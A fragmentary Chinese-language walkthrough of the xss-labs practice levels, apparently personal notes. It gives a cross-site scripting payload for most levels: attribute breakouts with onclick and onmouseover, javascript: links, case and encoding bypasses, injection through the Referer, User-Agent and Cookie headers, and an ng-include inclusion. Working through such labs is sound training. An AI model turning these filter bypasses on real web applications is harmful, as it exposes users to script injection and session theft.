1
没做任何过滤大白给
2.
她是个干什么的?百度一下
作用:把预定义的字符转换为 HTML 实体,而不是作为标签运行;如果不用HTMLSpecialChars,就会导致读取时,把"
用这个触发
'οnclick='alert(/xss/)
4.
过滤了<>,但没转义
闭合input标签中的value
"onclick='alert(/xss/)'
引用keyword时没有转义
"> <a href='javascript:alert(1)'>
没有转化为小写
大小写绕过
"><img Src="1.jpg" Onerror="alert(6666)">
可以复写绕过
编码绕过把t编码 t
javascript:alert(1)
9.和8一样但
输入中必须包含http://
javascript:alert(1)//http://www.2333333.com
分别对这四个参数进行GET传参:
keyword=test&t_link=test1&t_history=test2&t_sort=test3
三个隐藏的input参数:t_link、t_history、t_sort
t_sort被写入到html页面且过滤了尖括号,并没有进行编码
双引号闭合input标签中对value
?t_sort="type="text" οnmοuseοver="alert(1)
抓包修改Referer字段
php Referer: "οnmοuseοver="alert(/xss/)
12
抓包修改user-agent字段
User-Agent: "οnmοuseοver="alert(/xss/)
改cookie
Cookie: user="οnmοuseοver="alert(/xss/)
我tm直接疑惑
15.
15.
利用ng-include指令的特性包含一个有漏洞的html文件
src='http://127.0.0.1/xss-labs-master/level1.php?name="><a href="javascript:alert(/xss/)">xss'
16。
将%0a或者%0D当成空格使用
?keyword=<a%0Ahref='javas%0Acript:alert("xss")'>xss
embed标签定义嵌入的内容,并且做了尖括号过滤,加入一个属性进去
arg01= onmousemove&arg02=javascript:alert(/xss/)
18.和17一样
19.rg01=version&arg02=<a href='javascript:alert(/xss/)'>xss</a>
2.????